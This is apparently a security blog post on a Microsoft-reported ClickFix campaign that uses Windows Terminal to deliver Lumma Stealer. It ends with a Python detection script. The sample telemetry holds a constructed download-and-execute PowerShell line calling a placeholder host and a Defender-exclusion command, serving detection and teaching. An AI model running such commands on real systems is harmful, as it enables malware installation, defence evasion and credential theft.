Microsoft Warns of ClickFix Using Windows Terminal to Distribute Lumma Stealer
- Mar 6
- 2 min read
Key Findings:
Microsoft Defender experts uncovered a widespread ClickFix campaign that abuses Windows Terminal (no Terminal vulnerability is involved) to deliver Lumma Stealer malware.
The campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, sidestepping detections keyed on the Run dialog (Win + R).
Attackers guide users to paste malicious PowerShell commands from fake CAPTCHAs, troubleshooting prompts, or verification-style lures.
The malicious payload downloads and executes a multi-stage attack, enabling additional payloads, persistence, Defender evasion, and data exfiltration.
The final-stage payload is a Lumma Stealer component that performs QueueUserAPC()-based code injection into Chrome and Edge processes to target browser artifacts and credentials.
Background
In February 2026, Microsoft Defender experts identified a new ClickFix social engineering campaign that leverages Windows Terminal as the primary execution mechanism, instead of the traditional Run dialog method. This approach allows attackers to bypass specific detections and blend the attack into legitimate administrative workflows, making it appear more trustworthy to users.
Windows Terminal Abuse
Rather than instructing targets to launch the Run dialog (Win + R) and paste a command, this campaign guides users to use the Windows + X → I shortcut to open Windows Terminal (wt.exe) directly. The shortcut opens an ordinary, non-elevated Terminal session running as the signed-in user (Windows + X → A is the "Terminal (Admin)" variant), so the pasted command runs with that user's rights; no vulnerability in Windows Terminal is exploited. Because the same shortcut is part of routine Windows administration, the action looks legitimate to the victim and to detections that only watch the Run dialog.
Malicious Payload Delivery
Users are tricked into pasting a hex-encoded, XOR-obfuscated command into the Windows Terminal session (XOR is not compression; it is a cheap, reversible transform used to keep recognisable strings out of the command line). The pasted command spawns additional Terminal/PowerShell processes to decode and run the script, which downloads and extracts a multi-stage payload, including a renamed 7-Zip binary and a ZIP file containing further malicious components.
Lumma Stealer Deployment
The final-stage payload deployed to C:\ProgramData\app_config\ctjb is identified as a Lumma Stealer component. It uses QueueUserAPC()-based code injection (queueing an asynchronous procedure call on a thread of the target process so the injected code runs in that process's context) against Chrome and Edge, allowing the stealer to harvest high-value browser artifacts, such as stored credentials, and exfiltrate them to attacker-controlled infrastructure.
Attack Chain Evasion
The ClickFix campaign also features techniques to evade detection, including configuring Microsoft Defender exclusions and abusing LOLBins (Living Off The Land Binaries) to execute the malicious script. Adding a Defender exclusion requires administrative rights and is itself a visible event: the change is recorded in the Defender operational log and the Add-MpPreference command line appears in process-creation telemetry, so it is a useful hunting signal rather than something the attacker can hide.
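The following is an added detection example, not Microsoft's detection logic and not code from any of the cited articles. It replays constructed process-creation events (the Image, ParentImage, CommandLine and OriginalFileName fields that Sysmon Event ID 1 or EDR telemetry expose) and raises findings for the three behaviours described on this page: a PowerShell process spawned from a Terminal session whose command line carries a long hex blob (which it then decodes by hex-decoding and searching all single-byte XOR keys), a Defender exclusion added from the command line, and a binary whose version resource says 7z.exe but whose on-disk name does not. The sample events, file paths, XOR key and embedded stage-1 text are all made up for the demonstration.

```python
"""ClickFix-in-Terminal hunting example (constructed data, not the campaign's real artifacts)."""
import re
import string
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str
    original_file_name: str = ""   # Sysmon's OriginalFileName (from the PE version resource)


# Windows Terminal's host process is WindowsTerminal.exe; wt.exe is the launcher alias the page names.
TERMINAL_IMAGES = ("windowsterminal.exe", "wt.exe")
SHELL_IMAGES = ("powershell.exe", "pwsh.exe")
HEX_BLOB = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{64,}(?![0-9a-fA-F])")
EXCLUSION_CMD = re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I)
PRINTABLE = set(string.printable.encode("ascii"))
SCRIPT_TOKENS = (b"iex", b"invoke-expression", b"downloadstring", b"http", b"frombase64string")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def script_score(data: bytes) -> int:
    """-1 if the candidate is not mostly printable, else the number of PowerShell-ish tokens in it."""
    if not data or sum(b in PRINTABLE for b in data) / len(data) < 0.95:
        return -1
    low = data.lower()
    return sum(tok in low for tok in SCRIPT_TOKENS)


def recover_payload(hex_text: str):
    """Hex-decode the blob, try all 256 single-byte XOR keys (key 0 == plain hex) and
    return (key, plaintext) for the best-scoring candidate, or None if nothing looks like a script."""
    raw = bytes.fromhex(hex_text)
    score, key = max((script_score(xor_bytes(raw, k)), k) for k in range(256))
    return (key, xor_bytes(raw, key)) if score > 0 else None


def analyze(events):
    findings = []
    for ev in events:
        img, parent = _basename(ev.image), _basename(ev.parent_image)
        if img in SHELL_IMAGES:
            m = HEX_BLOB.search(ev.command_line)
            if m:
                rec = recover_payload(m.group(0))
                findings.append({
                    "rule": "encoded-command-in-shell",
                    # parent is the Terminal host itself or the interactive shell it opened
                    "terminal_lineage": parent in TERMINAL_IMAGES or parent in SHELL_IMAGES,
                    "key": rec[0] if rec else None,
                    "decoded": rec[1].decode("ascii", "replace") if rec else None,
                })
        if EXCLUSION_CMD.search(ev.command_line):
            findings.append({"rule": "defender-exclusion-added", "command": ev.command_line})
        if ev.original_file_name.lower() == "7z.exe" and img != "7z.exe":
            findings.append({"rule": "renamed-7zip", "image": ev.image})
    return findings


# ---- constructed sample telemetry (hypothetical paths, key and stage-1 text) ----
XOR_KEY = 0x5A
STAGE1 = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = xor_bytes(STAGE1, XOR_KEY).hex()
WT_HOST = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_demo\WindowsTerminal.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    ProcEvent(WT_HOST, r"C:\Windows\explorer.exe", "wt.exe"),                 # user presses Win+X, I
    ProcEvent(PS, WT_HOST, "powershell.exe"),                                  # the interactive shell
    ProcEvent(PS, PS, f"powershell -NoP -W Hidden -c \"$h='{ENCODED}'\""),    # pasted stage-1
    ProcEvent(PS, PS, r"powershell -c Add-MpPreference -ExclusionPath 'C:\ProgramData\app_config'"),
    ProcEvent(r"C:\ProgramData\app_config\svc.exe", PS, "svc.exe x stage.zip", "7z.exe"),
]


def demo():
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

The XOR key search is the part worth keeping: a single-byte key is the common case for this kind of obfuscation, and scoring candidates by printability plus a handful of PowerShell tokens recovers the plaintext without knowing the key in advance. On real telemetry, extend the lineage check to walk the full ancestry to WindowsTerminal.exe, and pair the process rule with PowerShell script block logging (Event ID 4104), since text pasted into an already running interactive shell never shows up on any process command line.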
Sources
https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
https://www.cypro.se/2026/03/06/microsoft-reveals-clickfix-campaign-using-windows-terminal-to-deploy-lumma-stealer/
https://www.facebook.com/thehackernews/posts/-clickfix-has-moved-to-windows-terminalmicrosoft-says-victims-are-told-to-open-w/1310957267735520/